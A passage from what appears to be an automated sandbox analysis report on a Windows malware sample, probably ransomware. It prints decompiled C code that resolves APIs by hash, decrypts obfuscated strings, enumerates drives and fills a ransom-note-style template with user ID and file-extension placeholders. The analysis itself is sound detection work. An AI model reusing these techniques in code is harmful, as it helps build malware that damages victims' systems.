						if(_v16 == 0) {
							goto L47;
						} else {
							goto L41;
						}
						do {
							L41:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 0xa:
						__eax =  &_v52;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v52;
						_push( &_v52);
						__eax = __eax->i();
						__eax =  &_v52;
						if(_v52 == 0) {
							L47:
							_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x3c)) + _t122 + 0x78)) + _t122;
							_a4 = _t119;
							if( *((intOrPtr*)(_t119 + 0x18)) == 0) {
								goto L52;
							}
							_push(_t110);
							_t112 =  *((intOrPtr*)(_t119 + 0x20)) + _t122;
							_t120 = 0;
							while(E00401070( *_t112 + _t122) != _a8) {
								_t120 = _t120 + 1;
								_t112 = _t112 + 4;
							}
							_v8 = _t120;
							_t85 =  &_a4; // 0x53534b
							return  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x1c)) + ( *( *((intOrPtr*)( *_t85 + 0x24)) + _v8 * 2 + _t122) & 0x0000ffff) * 4 + _t122)) + _t122;
						} else {
							goto L46;
						}
						do {
							L46:
							__eax->i =  *__eax + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
				}
			}

0x004010bb
0x004010c3
0x004010cc
0x004010cf
0x004010d2
0x004010d5
0x004010d8
0x004010db
0x004010de
0x004010e6
0x004010e7
0x004010e8
0x004010ef
0x004010f5
0x004010fc
0x00401100
0x00401103
0x0040110a
0x00401111
0x00401117
0x0040111a
0x00401121
0x00401128
0x0040112e
0x00401132
0x00401135
0x0040113c
0x00401143
0x0040114a
0x00401151
0x00401158
0x0040115b
0x00401162
0x00401169
0x00401170
0x00401176
0x0040117d
0x00401184
0x0040118b
0x0040118e
0x00401198
0x00401407
0x00000000
0x00401407
0x0040119e
0x00000000
0x004011aa
0x00000000
0x00000000
0x004011b1
0x004011b4
0x004011b4
0x004011b6
0x004011b7
0x004011c3
0x004011c8
0x004011c9
0x004011ca
0x004011cd
0x004011ce
0x004011d6
0x004011d9
0x00000000
0x00000000
0x00000000
0x00000000
0x004011df
0x004011df
0x004011df
0x004011e2
0x004011e3
0x00000000
0x00000000
0x004011ed
0x004011f0
0x004011f0
0x004011f2
0x004011f3
0x004011ff
0x00401204
0x00401205
0x00401206
0x00401209
0x0040120a
0x00401212
0x00401215
0x00000000
0x00000000
0x00000000
0x00000000
0x0040121b
0x0040121b
0x0040121b
0x0040121e
0x0040121f
0x00000000
0x00000000
0x00401229
0x0040122c
0x0040122c
0x0040122e
0x0040122f
0x0040123b
0x00401240
0x00401241
0x00401242
0x00401245
0x00401246
0x0040124e
0x00401251
0x00000000
0x00000000
0x00000000
0x00000000
0x00401257
0x00401257
0x00401257
0x0040125a
0x0040125b
0x00000000
0x00000000
0x00401265
0x00401268
0x00401268
0x0040126a
0x0040126b
0x00401277
0x0040127c
0x0040127d
0x0040127e
0x00401281
0x00401282
0x0040128a
0x0040128d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401293
0x00401293
0x00401293
0x00401296
0x00401297
0x00000000
0x00000000
0x004012a1
0x004012a4
0x004012a4
0x004012a6
0x004012a7
0x004012b3
0x004012b8
0x004012b9
0x004012ba
0x004012bd
0x004012be
0x004012c6
0x004012c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004012cf
0x004012cf
0x004012cf
0x004012d2
0x004012d3
0x00000000
0x00000000
0x00000000
0x00000000
0x004012dd
0x004012e0
0x004012e0
0x004012e2
0x004012e3
0x004012ef
0x004012f4
0x004012f5
0x004012f6
0x004012f9
0x004012fa
0x00401302
0x00401305
0x00000000
0x00000000
0x00000000
0x00000000
0x0040130b
0x0040130b
0x0040130b
0x0040130e
0x0040130f
0x00000000
0x00000000
0x00401319
0x0040131c
0x0040131c
0x0040131e
0x0040131f
0x0040132b
0x00401330
0x00401331
0x00401332
0x00401335
0x00401336
0x0040133e
0x00401341
0x00000000
0x00000000
0x00000000
0x00000000
0x00401343
0x00401343
0x00401343
0x00401346
0x00401347
0x00000000
0x00000000
0x0040134e
0x00401351
0x00401351
0x00401353
0x00401354
0x00401360
0x00401365
0x00401366
0x00401367
0x0040136b
0x00401373
0x00401376
0x00000000
0x00000000
0x00000000
0x00000000
0x00401378
0x00401378
0x00401378
0x0040137b
0x0040137c
0x00000000
0x00000000
0x00401383
0x00401386
0x00401386
0x00401388
0x00401389
0x00401395
0x0040139a
0x0040139b
0x0040139c
0x0040139f
0x004013a0
0x004013a8
0x004013ab
0x004013b6
0x004013bd
0x004013bf
0x004013c6
0x00000000
0x00000000
0x004013c8
0x004013cc
0x004013ce
0x004013d0
0x004013e0
0x004013e1
0x004013e1
0x004013e6
0x004013e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004013ad
0x004013ad
0x004013ad
0x004013b0
0x004013b1
0x00000000
0x00000000

Strings

WP, xrefs: 00401128
KSS, xrefs: 0040114A
YWJY, xrefs: 00401162
\ZLY, xrefs: 004010F5
HK]H, xrefs: 00401121
KSS, xrefs: 0040117D
^PUP, xrefs: 0040113C
U[KS, xrefs: 004010C3
KSS, xrefs: 004013E9
S, xrefs: 004010EF
SS, xrefs: 00401170
ZOLS, xrefs: 0040110A

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: HK]H$KSS$KSS$KSS$S$SS$U[KS$WP$YWJY$ZOLS$\ZLY$^PUP
API String ID: 1029625771-782699805
Opcode ID: 4284b2ea2b96a353411fa2b1ceb0578fe7228a9d0b979161256991be00a691b6
Instruction ID: 6046a318d2cad1ad2efb407e74ad78b0982eb8c8fae3b2f48d4c69c4c588eacc
Opcode Fuzzy Hash: 4284b2ea2b96a353411fa2b1ceb0578fe7228a9d0b979161256991be00a691b6
Instruction Fuzzy Hash: B8B1F872C082989FEB12DBB0C885BDD7FB0AF16310F14029BD492BB2E2D7785945C755

Uniqueness

Uniqueness Score: 100.00%

Function 0040451D, Relevance: 19.8, APIs: 4, Strings: 9, Instructions: 299
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0040451D() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				short _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				char _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				char _v300;
				short _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				char _v344;
				short _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				char _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				char _v432;
				short _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				char _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				WCHAR* _v512;
				char _v528;
				char _v672;
				intOrPtr _t168;
				void* _t186;
				void* _t188;
				void* _t190;
				void* _t203;
				int _t206;
				intOrPtr _t209;
				signed int _t216;
				intOrPtr _t219;
				short _t238;
				WCHAR* _t242;
				WCHAR* _t245;
				intOrPtr _t253;
				intOrPtr _t255;

				_t168 = E00408E33();
				 *0x41989c = _t168;
				_t261 = _t168;
				if(_t168 != 0) {
					_t219 = E0040C5DE(_t168); // executed
					 *0x41989c = _t219;
				}
				E004019DF();
				_v512 = E00401A11();
				_v180 = 0x42d87bef;
				_v176 = 0xc48964bf;
				_v172 = 0xd069b707;
				_v168 = 0xbf1c5318;
				_v164 = 0x74ff7907;
				_v160 = 0x74ff7917;
				_v156 = 0xfe0fb05f;
				_v152 = 0x9ccb1c61;
				_v148 = 0x94ea1add;
				_v144 = 0xe786095f;
				_v484 = E00407563( &_v180);
				_v220 = 0xc8fe81f8;
				_v216 = 0x471698f6;
				_v212 = 0x9ff0519;
				_v208 = 0xa6e53516;
				_v204 = 0x16f363fb;
				_v200 = 0x16f363eb;
				_v196 = 0x7da1bb16;
				_v192 = 0x5d06c173;
				_v188 = 0x7c66e8e4;
				_v184 = 0x97e16cb4;
				_v508 = E00407563( &_v220);
				_v344 = 0xa2c6bfa8;
				_v340 = 0x6d3a2a77;
				_v336 = 0x887cc692;
				_v332 = 0xcb993b67;
				_v328 = 0x1ca84cf9;
				_v324 = 0x1ca84ceb;
				_v320 = 0x671ba507;
				_v316 = 0x6eade141;
				_v312 = 0x27f2ee27;
				_v308 = 0x9974d8cd;
				_v304 = 0xbc65;
				_v504 = E00407563( &_v344);
				_v36 = 0xd488b3db;
				_v32 = 0x99b30484;
				_v28 = 0xe3b917d8;
				_v24 = 0xf26b478f;
				_v20 = 0x8aa542d5;
				_v16 = 0x8aa542d3;
				_v12 = 0x973783af;
				_v8 = 0x90c5;
				_v500 = E00407563( &_v36);
				_v260 = 0xd332831f;
				_v256 = 0xefca788;
				_v252 = 0x52429b6e;
				_v248 = 0x99e0fb96;
				_v244 = 0x33a5aa61;
				_v240 = 0x33a5aa71;
				_v236 = 0x98d92d9d;
				_v232 = 0xb24a3dd0;
				_v228 = 0x1026b549;
				_v224 = 0x1665e976;
				_v496 = E00407563( &_v260);
				_v300 = 0xcc6ac817;
				_v296 = 0xb3596e07;
				_v292 = 0x53916abb;
				_v288 = 0xce2e7ae8;
				_v284 = 0x32afe37;
				_v280 = 0x32afe27;
				_v276 = 0x802dfec;
				_v272 = 0xda37a217;
				_v268 = 0xeb0a3552;
				_v264 = 0x9a962c45;
				_v492 = E00407563( &_v300);
				_v388 = 0xf312b3b;
				_v384 = 0xcd1a56a3;
				_v380 = 0xe4d5f22b;
				_v376 = 0x47855a3e;
				_v372 = 0xdcef8422;
				_v368 = 0xdcef8430;
				_v364 = 0x6829b5ac;
				_v360 = 0x15414e1d;
				_v356 = 0xfeed9b6;
				_v352 = 0xc21897b6;
				_v348 = 0x3749;
				_v488 = E00407563( &_v388);
				_v140 = 0x433e2aa4;
				_v136 = 0xcaefe608;
				_v132 = 0xc67f4b8b;
				_v128 = 0xb9316b00;
				_v124 = 0xf5279fc2;
				_v120 = 0xf5279fcc;
				_v116 = 0xf2c54617;
				_v112 = 0x97ebf05c;
				_v108 = 0x2443f1d0;
				_v104 = 0xc70c;
				_t186 = E00407563( &_v140);
				_v432 = 0x2bca93f4;
				_v428 = 0x35ba4d1f;
				_v424 = 0xa71bc175;
				_v420 = 0xc0c1f5eb;
				_v416 = 0x4b3ea45b;
				_v412 = 0x4b3ea44f;
				_v408 = 0x65d6fa10;
				_v404 = 0xd4a94675;
				_v400 = 0x3681dc5d;
				_v396 = 0x7e3c94fb;
				_v392 = 0xc83a4fa4;
				_t188 = E00407563( &_v432);
				_v100 = 0x8596460a;
				_v96 = 0x211d5ded;
				_v92 = 0x6a5bf88f;
				_v88 = 0x50a33af0;
				_v84 = 0x5028adde;
				_v80 = 0x5028add6;
				_v76 = 0x2b24007a;
				_v72 = 0x5217e318;
				_t190 = E00407563( &_v100);
				_v68 = 0xeedeb84a;
				_v64 = 0x98a67ee0;
				_v60 = 0xa8eb5bda;
				_v56 = 0x2cb69c29;
				_v52 = 0xd5105f4e;
				_v48 = 0xd5105f48;
				_v44 = 0xcd69d265;
				_v40 = 0xf39;
				E00401B43( &_v672, 0, _v484, 0, _v508, 0, _v504, 0, _v500, 0, _v496, 0, _v492, 0, _v488, 0, _t186, 1, _t188, 0, _t190, 0, E00407563( &_v68));
				E0040A4E1( &_v672); // executed
				E00405C38( &_v528, 0x42 + E0040A37C( &_v672) * 2); // executed
				E004096FA( &_v672, _t261, E00405C7D( &_v528, 0x40 + _t196 * 2)); // executed
				_v480 = 0x6bab4a4f;
				_v476 = 0x9b10704d;
				_v472 = 0x3104cfa4;
				_v468 = 0xde657fd0;
				_v464 = 0x5f491fdb;
				_v460 = 0x5f491fcd;
				_v456 = 0xda2823d8;
				_v452 = 0xd90464c;
				_v448 = 0xffaacc3;
				_v444 = 0x6bb3babe;
				_v440 = 0xf0b5e7d5;
				_v436 = 0x3706;
				_t242 = E00407563( &_v480);
				_t203 = E0040C4EB(_t199, _t242);
				_v484 = _t203 + lstrlenW(_t242) * 2;
				_t206 = lstrlenW( *0x419874);
				_t243 = _v512;
				_t209 = E0040C6BA(0xa + (_t206 + lstrlenW(_v512)) * 2); // executed
				_t253 = _t209;
				 *0x419884 = _t253;
				if(_t253 != 0) {
					E00401AAD(_t253, _t243);
					E00401A92( *0x419884,  *0x419874);
					_t255 =  *0x419884; // 0x69b0000
					if(_t255 != 0) {
						while(1) {
							_t245 = E0040C4EB(_t255, L"{USERID}");
							if(_t245 == 0) {
								break;
							}
							E00401AAD(_t245, _v484);
							_t216 = lstrlenW(_t245);
							_t238 = 0x20;
							_t245[_t216] = _t238;
						}
						E0040C3D9(_t255, L"{V}", L"5.2");
						E0040C3D9(_t255, L"{EXTENSION}",  *0x41989c);
					}
				}
				E00405C6C( &_v528);
				return E004095B4( &_v672);
			}

0x00404526
0x0040452b
0x00404530
0x00404532
0x00404535
0x0040453b
0x0040453b
0x00404543
0x0040454d
0x0040455a
0x00404564
0x0040456e
0x00404578
0x00404582
0x0040458c
0x00404596
0x004045a0
0x004045aa
0x004045b4
0x004045c3
0x004045d0
0x004045da
0x004045e4
0x004045ee
0x004045f8
0x00404602
0x0040460c
0x00404616
0x00404620
0x0040462a
0x00404639
0x00404646
0x00404650
0x0040465a
0x00404664
0x0040466e
0x00404678
0x00404682
0x0040468c
0x00404696
0x004046a0
0x004046aa
0x004046b8
0x004046c2
0x004046c9
0x004046d0
0x004046d7
0x004046de
0x004046e5
0x004046ec
0x004046f3
0x004046fe
0x0040470b
0x00404715
0x0040471f
0x00404729
0x00404733
0x0040473d
0x00404747
0x00404751
0x0040475b
0x00404765
0x00404774
0x0040477a
0x00404784
0x0040478e
0x00404798
0x004047a2
0x004047ac
0x004047bc
0x004047c7
0x004047d1
0x004047db
0x004047ea
0x004047f7
0x00404801
0x0040480b
0x00404815
0x0040481f
0x00404829
0x00404833
0x0040483d
0x00404847
0x00404851
0x0040485b
0x00404869
0x00404876
0x00404880
0x0040488a
0x00404891
0x00404898
0x0040489f
0x004048a6
0x004048ad
0x004048b4
0x004048bb
0x004048c1
0x004048c8
0x004048d8
0x004048e3
0x004048ed
0x004048f7
0x00404901
0x0040490b
0x00404915
0x0040491f
0x00404929
0x00404933
0x0040493d
0x00404944
0x0040494e
0x00404956
0x0040495d
0x00404964
0x0040496b
0x00404972
0x00404979
0x00404980
0x00404987
0x00404991
0x00404999
0x004049a0
0x004049a7
0x004049ae
0x004049b5
0x004049bc
0x00404a0c
0x00404a17
0x00404a37
0x00404a58
0x00404a63
0x00404a6e
0x00404a78
0x00404a82
0x00404a8c
0x00404a96
0x00404aa0
0x00404aaa
0x00404ab4
0x00404abe
0x00404ac8
0x00404ad2
0x00404ae0
0x00404ae4
0x00404b00
0x00404b06
0x00404b08
0x00404b1d
0x00404b22
0x00404b24
0x00404b2d
0x00404b31
0x00404b42
0x00404b47
0x00404b52
0x00404b6e
0x00404b79
0x00404b7f
0x00000000
0x00000000
0x00404b5d
0x00404b65
0x00404b69
0x00404b6a
0x00404b6a
0x00404b8c
0x00404b9d
0x00404ba2
0x00404b52
0x00404bab
0x00404bc1

APIs

Part of subcall function 00401B43: GetProcessHeap.KERNEL32 ref: 00401BD3

Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004,00000000,00000000,00000000), ref: 0040A508
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004,00000000,00000000,00000000), ref: 0040A547
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004,00000000,00000000,00000000), ref: 0040A585
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040A7DB
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040A837
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004,00000000,00000000,00000000), ref: 0040A854
Part of subcall function 0040A4E1: VirtualFree.KERNEL32(?,00000000,00008000,80000001,00000000,00000000,?,00000040,00000000), ref: 0040A9C6
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,0000008A,00003000,00000004,00000000,00000000,00000000), ref: 0040A9E4
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0040A9FE
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040AB50
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040AB97
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040ABE3
Part of subcall function 0040A4E1: VirtualFree.KERNELBASE(?,00000000,00008000,80000001,?,?,-0000000E,00000080,00000000), ref: 0040ABF2
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000082,00003000,00000004,00000000,00000000,00000000), ref: 0040AC10
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040B014
Part of subcall function 0040A4E1: GetNativeSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 0040B039
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000040,00003000,00000004), ref: 0040B048
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040B11C
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,00000000,00000000,00000000), ref: 0040B1A1
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0040B1B5
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(?,80000002,?,00000000,?,00000080,00000000), ref: 0040B48E
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040B4C8
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(?), ref: 0040B538
Part of subcall function 0040A4E1: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0040B581
Part of subcall function 0040A4E1: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,?,?,?,?,00000000,00000000,00000000), ref: 0040B8D1
Part of subcall function 0040A4E1: GetDriveTypeW.KERNELBASE(?,?,?,?,?,00000000,00000000,00000000), ref: 0040B937
Part of subcall function 0040A4E1: GetDiskFreeSpaceW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9D3
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(2B24007A,?,00000000,?,00000000,?,00000000,?,00000000), ref: 0040BA25
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040BA46
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(2B24007A,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040BA54
Part of subcall function 0040A4E1: wsprintfW.USER32 ref: 0040BA6E
Part of subcall function 0040A4E1: lstrlenW.KERNEL32(2B24007A,?,?,?,?,00000000,00000000,00000000), ref: 0040BAB1

Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A38A
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A395
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3A9
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3B4
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3CA
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3D5
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3EB
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A3F6
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A40C
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A417
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A42D
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A438
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A44E
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A459
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A46F
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A47A
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A499
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4A4
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,00000000,00000000,00000000,00404A27,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4C0
Part of subcall function 0040A37C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 0040A4CE

Part of subcall function 00405C38: VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

Part of subcall function 004096FA: wsprintfW.USER32 ref: 0040999B
Part of subcall function 004096FA: wsprintfW.USER32 ref: 004099AA
Part of subcall function 004096FA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409A0B

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 00404AF5
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 00404B06
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00008000), ref: 00404B11

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

lstrlenW.KERNEL32(00000000), ref: 00404B65

Part of subcall function 00405C6C: VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

Part of subcall function 004095B4: VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,7757BFA8,00404BBB), ref: 00409615
Part of subcall function 004095B4: VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,7757BFA8,00404BBB), ref: 004096CF

Part of subcall function 0040C5DE: lstrlenW.KERNEL32(:E@,00000000,?,0040453A,00000000), ref: 0040C5E5

Strings

I7, xrefs: 0040485B
w*:m, xrefs: 00404650
f|, xrefs: 00404620
{V}, xrefs: 00404B86
{EXTENSION}, xrefs: 00404B97
R5, xrefs: 004047D1
5.2, xrefs: 00404B81
{USERID}, xrefs: 00404B6E
z, xrefs: 00404972

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: lstrlen$Virtual$Alloc$wsprintf$Free$DiskDriveHeapInfoNativeProcessSpaceSystemType
String ID: 5.2$I7$R5$w*:m$z${EXTENSION}${USERID}${V}$f|
API String ID: 3288103055-2746965668
Opcode ID: 275f626e853b4b8bd4a02eeed10e334c6856440db4ff05a07f2cf7ae3708ecfb
Instruction ID: ed9ccf0b78c1a67819efb59c0f58f3b6afd50c5ea86a7f5d20a56f584c1727e0
Opcode Fuzzy Hash: 275f626e853b4b8bd4a02eeed10e334c6856440db4ff05a07f2cf7ae3708ecfb
Instruction Fuzzy Hash: B5F121B0C05268ABDB21DF91DD81BDEBB78BF05304F1081EAE5087B251DB345A81CF99

Uniqueness

Uniqueness Score: 100.00%

Function 00408FD7, Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 283
UNIQUE

Download Yara Rule

C-Code - Quality: 83%

			E00408FD7(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v105;
				char _v106;
				short _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				short _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				char _v348;
				short _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
